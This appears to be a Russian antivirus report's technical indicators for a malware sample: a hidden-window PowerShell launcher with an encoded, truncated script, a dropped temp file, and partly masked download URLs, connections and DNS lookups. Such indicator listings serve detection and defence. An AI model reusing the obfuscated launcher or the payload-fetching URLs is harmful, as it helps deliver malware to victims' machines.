Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAG8AcwBzADcAegAxAD0AKAAnAFEAJwArACcAZQB1ACcAKwAnAHYAcQBtAHkAJwApADsALgAoACcAbgBlACcAKwAnAHcALQBpAHQAJwArACcAZQBtACcAKQAgACQARQBuAHYAOgBUAGUAbQBQAFwAbwBGAGYAaQBDAEUAMgAwADEAOQAgAC0AaQB0AG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1964
- %TEMP%\1214093.cvr
- 'ma###sprost.lu':80
- 'me####sscargo.com':80
- 'me####sscargo.com':443
- 'fa###ha.com.br':80
- 'do####niverse.com':80
- 'do####niverse.com':443
- 'ad###ro.com.br':80
- 'it###uture.com':443
- 'al####nmission.net':443
- http://ma###sprost.lu/wp-admin/EjNkLlwjGEk/
- http://www.me####sscargo.com/apmbh/uEJLd4i3b12/
- http://fa###ha.com.br/temp/XVmDFA/
- http://www.do####niverse.com/pics/VzC1ngzg67686813/
- http://ad###ro.com.br/minhaagua/fmeogbIkCT/
- 'me####sscargo.com':443
- 'do####niverse.com':443
- 'al####nmission.net':443
- DNS ASK ma###sprost.lu
- DNS ASK me####sscargo.com
- DNS ASK fa###ha.com.br
- DNS ASK do####niverse.com
- DNS ASK ad###ro.com.br
- DNS ASK it###uture.com
- DNS ASK al####nmission.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAG8AcwBzADcAegAxAD0AKAAnAFEAJwArACcAZQB1ACcAKwAnAHYAcQBtAHkAJwApADsALgAoACcAbgBlACcAKwAnAHcALQBpAHQAJwArACcAZQBtACcAKQAgACQARQBuAHYAOgBUAGUAbQBQAFwAbwBGAGYAaQBDAEUAMgAwADEAOQAgAC0AaQB0AG...' (со скрытым окном)